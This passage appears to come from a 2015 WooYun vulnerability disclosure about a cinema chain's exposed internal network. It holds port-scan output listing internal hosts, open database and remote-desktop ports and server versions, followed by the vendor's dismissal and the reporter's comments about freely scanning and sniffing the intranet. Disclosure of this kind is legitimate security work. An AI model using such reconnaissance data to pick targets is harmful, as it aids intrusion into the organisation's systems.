10.110.17.156;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.17.157;"80";"Done";"";"Microsoft-IIS/7.5";"";"";"";"";"";"";""
10.110.17.242;"80";"Done";"";"nginx/1.4.4";"";"";"";"";"";"";""
10.110.17.243;"80";"Done";"";"nginx/1.4.4";"";"";"";"";"";"";""
10.110.17.244;"80";"Done";"";"nginx/1.4.4";"";"";"";"";"";"";""
10.110.17.245;"80";"Done";"";"nginx/1.4.4";"";"";"";"";"";"";""
10.110.17.246;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.17.247;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.17.248;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.18.70;"80";"Done";"";"nginx/1.1.19";"";"";"";"";"";"";""
10.110.18.70;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.18.74;"80";"Done";"";"nginx/1.2.6 (Ubuntu)";"";"";"";"";"";"";""
10.110.18.74;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.18.76;"80";"Done";"";"nginx/1.2.6 (Ubuntu)";"";"";"";"";"";"";""
10.110.18.76;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.18.78;"80";"Done";"";"nginx/1.2.6 (Ubuntu)";"";"";"";"";"";"";""
10.110.18.82;"80";"Done";"";"nginx";"";"";"";"";"";"";""
10.110.18.82;"8080";"Done";"";"Apache";"";"";"";"";"";"";""
10.110.18.82;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.22;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.19.22;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.23;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.19.23;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.25;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.19.25;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.26;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.19.26;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.34;"80";"Done";"";"nginx";"";"";"";"";"";"";""
10.110.19.34;"443";"Done";"";"nginx";"";"";"";"";"";"";""
10.110.19.35;"21";"HTTP -1";"";"Unknown";"";"";"";"";"";"";""
10.110.19.39;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.39;"21";"HTTP -1";"";"Unknown";"";"";"";"";"";"";""
10.110.19.43;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.44;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.62;"80";"Done";"";"Unknown";"";"";"";"";"";"";""
10.110.19.74;"8080";"Done";"";"Resin/4.0.38";"";"";"";"";"";"";""
10.110.19.74;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.74;"8888";"Done";"";"nginx/1.5.10";"";"";"";"";"";"";""
10.110.19.75;"80";"Done";"";"nginx/1.5.10";"";"";"";"";"";"";""
10.110.19.75;"8080";"Done";"";"Resin/4.0.38";"";"";"";"";"";"";""
10.110.19.75;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.90;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.90;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.98;"80";"Done";"";"nginx";"";"";"";"";"";"";""
10.110.19.98;"443";"Done";"";"nginx";"";"";"";"";"";"";""
10.110.19.99;"21";"HTTP -1";"";"Unknown";"";"";"";"";"";"";""
10.110.19.103;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.104;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.107;"80";"Done";"";"nginx";"";"";"";"";"";"";""
10.110.19.107;"8080";"Done";"";"Apache";"";"";"";"";"";"";""
10.110.19.107;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.122;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.19.122;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.122;"443";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.123;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.130;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.19.130;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.19.131;"8080";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.19.138;"80";"Done";"";"Hikvision-Webs";"";"";"";"";"";"";""
10.110.19.138;"7001";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.138;"21";"Checking HNAP...";"";"Unknown";"";"";"";"";"";"";""
10.110.19.162;"80";"Done";"";"Apache-Coyote/1.1";"";"";"";"";"";"";""
10.110.19.162;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.204;"80";"Done";"";"Apache";"";"";"";"";"";"";""
10.110.19.213;"3389";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.222;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.226;"8888";"Done";"";"Oracle Containers for J2EE";"";"";"";"";"";"";""
10.110.19.226;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.227;"8888";"Done";"";"Oracle Containers for J2EE";"";"";"";"";"";"";""
10.110.19.227;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.230;"8888";"Done";"";"Oracle Containers for J2EE";"";"";"";"";"";"";""
10.110.19.230;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.231;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.19.232;"1521";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.20.50;"80";"Done";"";"nginx/1.6.2";"";"";"";"";"";"";""
10.110.20.51;"80";"Done";"";"nginx/1.6.2";"";"";"";"";"";"";""
10.110.20.51;"3306";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.20.54;"80";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.20.54;"443";"Can't load main page";"";"";"";"";"";"";"";"";""
10.110.20.56;"80";"Done";"";"nginx/1.6.2";"";"";"";"";"";"";"&

修复方案:

大地给我电影票看电影,尔等吊丝

版权声明:转载请注明来源 DNS@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-05 17:48

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-31 17:50 | DNS ( 普通白帽子 | Rank:194 漏洞数:26 | 杀猪刀啊,杀猪刀啊)

    @疯狗 影响不止同网段吧,内网随意扫啊,对应的外网地址不知道而已啊!!

  2. 2015-08-31 17:52 | DNS ( 普通白帽子 | Rank:194 漏洞数:26 | 杀猪刀啊,杀猪刀啊)

    @疯狗 外网目前知道的就这个网段。然而内网我只扫了三个网段,出现的却都能对应外网IP,这是机房啊,根据IP市IDC骨干机房!危害不言而喻,

  3. 2015-08-31 18:55 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @DNS 嗯,确实是同网段,但是目前还未影响到其他服务器,所以本着事实客观的态度,先不能那样说哈:)

  4. 2015-08-31 20:06 | DNS ( 普通白帽子 | Rank:194 漏洞数:26 | 杀猪刀啊,杀猪刀啊)

    @疯狗 随便嗅探也能危害到其他服务器的。毕竟内网了

  5. 2015-09-05 17:55 | DNS ( 普通白帽子 | Rank:194 漏洞数:26 | 杀猪刀啊,杀猪刀啊)

    @疯狗 这也忽略 无良厂商

  6. 2015-09-05 17:57 | DNS ( 普通白帽子 | Rank:194 漏洞数:26 | 杀猪刀啊,杀猪刀啊)

    @大地影院 为什么忽略?

  7. 2015-09-05 23:57 | 魔域思密达 ( 路人 | Rank:0 漏洞数:1 | 研究为主)

    人家有的忙了

  8. 2015-09-11 16:44 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @DNS 已补rank,不知道企业那边啥情况。